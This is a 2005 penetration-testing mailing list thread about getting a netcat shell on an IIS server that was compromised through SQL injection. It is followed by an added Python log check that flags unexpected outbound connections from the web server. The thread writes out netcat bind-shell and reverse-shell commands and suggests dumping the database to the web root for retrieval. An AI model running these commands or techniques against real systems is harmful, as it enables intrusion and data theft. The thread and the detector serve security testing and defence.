Penetration Testing mailing list archives
RE: Netcat Question
From: Meidinger Chris <chris.meidinger () badenit de>
Date: Wed, 1 Jun 2005 15:43:39 +0200
Hi Intel,

I assume there is a firewall between you and the webserver? That would be a pretty logical explanation of why you can't access your bindshell.

If I were you, I would upload a script, have that script run locally to dump the database and place the results in a folder in wwwroot. Then you can pick it up with your browser.

If you want to get tricky, you should find a couple of .net applications that act as browser shells.

But remember: unless you are combined testing incident response and penetration you *don't* want to trip IDS. Outbound connections from a web server to a silly internet host on port 8000(!) are a dead giveaway for a properly tuned IDS or a decent firewall admin. Don't be surprised if you get blackholed.

Cheers,
Chris
-----Original Message-----
From: intel96 [mailto:intel96 () bellsouth net]
Sent: Wednesday, June 01, 2005 12:39 AM
To: pen-test () securityfocus com
Subject: Netcat Question

To All,

I am conducting a pentest and I have been able to upload netcat to the web server (IIS 6.0 - with ports 80/443 open) via ftp. I have tried to establish a shell both ways, but cannot get it to work:

On the web server I first tried:

    nc.exe -l -p 8000 -e cmd.exe

When I tried to connect to port 8000 on the web server I received a timeout on my side. I have also tried this with port 53 and it also did not work.

I then tried:

    nc.exe -nv my_public_ip_address 443 -d -e cmd.exe

This did not work either. I did not see the remote system trying to connect to my system via my logs.

I have access to upload anything to the system and run most commands via sql injections. I have administrator level access on the system at this time.

Any ideas on how I can get this shell to work? Or are there any other commands that may provide me more access or allow me to dump the database?

Thanks,
Intel96
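
The detection point raised in the reply above (a web server opening outbound connections is a giveaway), as an added example that is not part of the original thread: a Python check that scans firewall log lines for connections the web server itself initiated to destinations outside an allowlist. The log format, the addresses and the allowlist are constructed assumptions.

```python
import re

# Constructed firewall log lines (hypothetical format, documentation-range IPs).
SAMPLE_LOG = """\
2005-06-01T12:00:01 ALLOW TCP 203.0.113.7:51234 -> 192.0.2.10:80 SYN
2005-06-01T12:00:01 ALLOW TCP 192.0.2.10:80 -> 203.0.113.7:51234 SYN,ACK
2005-06-01T12:00:05 ALLOW TCP 192.0.2.10:1040 -> 10.0.0.20:1433 SYN
2005-06-01T12:03:17 DENY TCP 192.0.2.10:1045 -> 198.51.100.23:8000 SYN
2005-06-01T12:04:02 DENY TCP 192.0.2.10:1046 -> 198.51.100.23:443 SYN
"""

WEB_SERVERS = {"192.0.2.10"}            # assumed address of the web server
ALLOWED_EGRESS = {("10.0.0.20", 1433)}  # assumed approved backend (database)

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ALLOW|DENY) TCP "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) (?P<flags>\S+)$"
)


def find_unexpected_egress(log_text, web_servers=WEB_SERVERS,
                           allowed=ALLOWED_EGRESS):
    """Return connections a web server initiated to a non-approved destination."""
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the assumed format
        # Only a bare SYN marks a new connection; SYN,ACK is a reply to a client.
        if m["flags"] != "SYN" or m["src"] not in web_servers:
            continue
        dest = (m["dst"], int(m["dport"]))
        if dest not in allowed:
            alerts.append({"time": m["ts"], "src": m["src"], "dst": dest[0],
                           "dport": dest[1], "action": m["action"]})
    return alerts


if __name__ == "__main__":
    for a in find_unexpected_egress(SAMPLE_LOG):
        print("{time} {src} -> {dst}:{dport} ({action})".format(**a))
```

Because the rule keys on which side initiated the connection rather than on the port number, the attempt to port 443 is reported alongside the one to port 8000.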